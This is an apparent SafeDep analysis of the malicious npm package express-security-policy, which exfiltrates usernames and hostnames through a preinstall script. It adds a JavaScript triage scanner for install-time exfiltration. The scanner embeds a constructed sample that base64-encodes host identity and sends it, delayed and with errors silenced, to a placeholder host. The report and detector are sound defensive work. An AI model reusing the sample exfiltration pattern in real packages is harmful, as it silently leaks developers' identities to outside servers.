SafeDep

Summary

Note: This report is updated by a verification record

Package is malicious. A preinstall script exfiltrates user and host information to a remote server, using encoding to obscure the data, a delayed execution window, and suppressed error handling.

Verification Record

The package is marked as malware by OSV (MAL-2026-2828, source: amazon-inspector).

Details

The package exhibits multiple strong indicators of malicious behavior. Its preinstall script runs node scripts/env-check.js, so arbitrary code executes during npm install with no user interaction. Both index.js and scripts/env-check.js collect the current username and hostname, base64-encode them, and send them over HTTPS to a remote server (baooreqyqjveumkkyddc.supabase.co). Encoding the hostname and the request path also hides the exfiltrated values from casual review of network logs or source. Execution is delayed by 120 seconds, presumably to outlast short-lived dynamic analysis of the install step. Error handling on the HTTPS request is suppressed, so a failed or blocked request leaves no trace in the install output. Taken together, this evidence strongly indicates that the package is malicious.
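The following static triage script is an added example, not SafeDep's tooling or the package's own code. It checks an unpacked npm package for the pattern described above: an install lifecycle hook that runs a script which gathers host identity, base64-encodes it, waits, and makes an outbound request while swallowing errors. The indicator list, weights, the score threshold, and the two sample packages (including the placeholder host collector.example.invalid) are this example's own assumptions; the sample source is a constructed string that is only pattern-matched, never executed.

```javascript
// Added example: static triage of an unpacked npm package for install-time
// exfiltration indicators. Not SafeDep's code; indicator names, weights and the
// threshold below are assumptions chosen for illustration.

// Lifecycle hooks npm runs automatically when the package is installed as a dependency.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each indicator is a regex over source text plus a weight.
const INDICATORS = [
  { id: 'host-identity',    weight: 2, re: /\bos\.(hostname|userInfo)\s*\(/ },
  { id: 'base64-encode',    weight: 1, re: /\.toString\(\s*['"]base64['"]\s*\)|\bbtoa\s*\(/ },
  // setTimeout with a delay of at least 10000 ms (5+ digits); lazy match spans the callback body.
  { id: 'delayed-exec',     weight: 1, re: /setTimeout\s*\([\s\S]*?,\s*\d{5,}\s*\)/ },
  { id: 'outbound-request', weight: 2, re: /\b(https?\.(request|get)|fetch)\s*\(/ },
  // Empty 'error' listener or empty catch block: failures are deliberately hidden.
  { id: 'swallowed-error',  weight: 1, re: /\.on\(\s*['"]error['"]\s*,\s*(function\s*\([^)]*\)|\([^)]*\)\s*=>)\s*\{\s*\}|catch\s*(\([^)]*\))?\s*\{\s*\}/ },
];

// Returns the install-time hooks declared in package.json, with their commands.
function installHooks(packageJson) {
  const scripts = (packageJson && packageJson.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Extracts `node <file>.js` targets from a hook command so the scanner knows what actually runs.
function scriptTargets(command) {
  const targets = [];
  const re = /\bnode\s+(?:--?[\w-]+\s+)*([^\s;&|]+\.[cm]?js)\b/g;
  let m;
  while ((m = re.exec(command)) !== null) targets.push(m[1]);
  return targets;
}

// Runs every indicator over one file and reports the ones that fire.
function scanSource(path, text) {
  return INDICATORS
    .filter((ind) => ind.re.test(text))
    .map((ind) => ({ file: path, id: ind.id, weight: ind.weight }));
}

// pkg = { packageJson: object, files: { [relativePath]: sourceText } } from an unpacked tarball.
function triagePackage(pkg) {
  const hooks = installHooks(pkg.packageJson);
  const findings = [];
  for (const [path, text] of Object.entries(pkg.files || {})) {
    findings.push(...scanSource(path, text));
  }
  // Files reached directly from an install hook count double: they run without user interaction.
  const hookFiles = new Set(hooks.flatMap((h) => scriptTargets(h.command)));
  const score = findings.reduce(
    (sum, f) => sum + f.weight * (hookFiles.has(f.file) ? 2 : 1), 0);
  let verdict = 'clean';
  if (hooks.length > 0) verdict = 'review';               // any install hook deserves a look
  if (hooks.length > 0 && score >= 8) verdict = 'suspicious';
  return { hooks, hookFiles: [...hookFiles], findings, score, verdict };
}

// Constructed sample shaped like the report's description (not the real package contents).
// The host is a placeholder and this string is only scanned, never executed.
const SUSPECT_PACKAGE = {
  packageJson: {
    name: 'example-pkg',
    version: '0.0.1',
    scripts: { preinstall: 'node scripts/env-check.js' },
  },
  files: {
    'scripts/env-check.js': [
      "const os = require('os');",
      "const https = require('https');",
      "const id = Buffer.from(os.userInfo().username + '@' + os.hostname()).toString('base64');",
      'setTimeout(() => {',
      "  const req = https.request({ host: 'collector.example.invalid', path: '/' + id, method: 'GET' });",
      "  req.on('error', () => {});",
      '  req.end();',
      '}, 120000);',
    ].join('\n'),
    'index.js': 'module.exports = function securityPolicy() { return {}; };',
  },
};

// Constructed benign sample: a test script is not an install hook, and nothing phones home.
const BENIGN_PACKAGE = {
  packageJson: { name: 'tidy-lib', version: '1.0.0', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = (a, b) => a + b;' },
};

console.log(JSON.stringify(triagePackage(SUSPECT_PACKAGE), null, 2));
console.log(JSON.stringify(triagePackage(BENIGN_PACKAGE), null, 2));
```

The scoring deliberately treats any install hook as worth a manual look even when no indicator fires, because a hook is the one ingredient that turns the rest into unattended execution on every developer and CI machine that installs the package. Running `npm install --ignore-scripts` or setting `ignore-scripts=true` in .npmrc blocks this class entirely at the cost of breaking packages that legitimately need a build step.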

Package: express-security-policy@1.0.3
Verdict: Malicious (Verified)
Analysed at: 4/14/26, 8:03 PM
Source: https://registry.npmjs.org/express-security-policy/-/express-security-policy-1.0.3.tgz
SHA256: c841c8b1b9897519cce1a5b12f687679eddc8dc184c88dfcbad287487b40bb81
Confidence: High